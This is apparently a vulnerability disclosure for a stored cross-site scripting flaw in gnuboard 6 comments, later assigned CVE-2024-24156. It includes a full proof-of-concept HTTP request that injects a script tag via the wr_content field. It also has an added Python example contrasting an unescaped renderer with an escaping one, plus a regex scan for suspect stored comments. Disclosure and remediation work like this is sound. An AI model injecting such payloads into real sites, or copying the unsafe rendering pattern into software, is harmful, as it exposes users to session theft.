Stored XSS vulnerability due to HTML Escape unprocessed when writing comments
Hello.
Currently, there is a writing vulnerability using the
[Name of affected Product]
gnuboard 6
[Affected version]
https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5
[Vulnerability Type]
- Stored XSS
[Root Cause]
- While writing a reply on a post, the wr_content parameter is not sanitized for HTML tags, so posting a reply with an HTML tag causes a Stored XSS attack.
[Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187
As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly with the requests library to create comments, the HTML tags are reflected as they are.
This enables Stored XSS attacks by injecting the <script> tag.
Below is a PoC web request.
POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
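The root cause described in the post above, shown next to a hardened rendering path. This is an added example, not code from the original post or from gnuboard 6; the function names, the sample form bodies and the stored rows are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed inputs: the wr_content field from the PoC body, and a benign comment.
POC_BODY = "w=c&bo_table=free&wr_id=9&wr_content=<script>alert(1)</script>"
BENIGN_BODY = "w=c&bo_table=free&wr_id=9&wr_content=1+%3C+2%0D%0Asecond+line"

TAG_LIKE = re.compile(r"<\s*/?\s*[a-zA-Z!]")  # opening/closing tag or comment start


def comment_from_form(body: str) -> str:
    """Read wr_content as the server receives it; browser-side input limits do not apply here."""
    return parse_qs(body, keep_blank_values=True).get("wr_content", [""])[0]


def render_comment_unsafe(wr_content: str) -> str:
    """Flawed pattern: stored text is emitted as markup."""
    return f'<div class="comment">{wr_content}</div>'


def render_comment_safe(wr_content: str) -> str:
    """Escape the stored text, then add the only markup the page itself wants (<br>)."""
    text = wr_content.replace("\r\n", "\n")
    escaped = html.escape(text, quote=True)
    return '<div class="comment">' + escaped.replace("\n", "<br>") + "</div>"


def find_suspect_comments(rows):
    """Return ids of already-stored comments that contain tag-like text, for review."""
    return [row_id for row_id, content in rows if TAG_LIKE.search(content)]


if __name__ == "__main__":
    poc = comment_from_form(POC_BODY)
    print(render_comment_unsafe(poc))
    print(render_comment_safe(poc))
    print(render_comment_safe(comment_from_form(BENIGN_BODY)))
    stored = [(1, "hello"), (2, poc), (3, "1 < 2")]  # constructed rows
    print(find_suspect_comments(stored))
```

Escaping at output time also neutralizes comments that were stored before a fix; the scan helps decide which existing rows deserve a manual look.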
1 comment
This vulnerability has been assigned CVE-2024-24156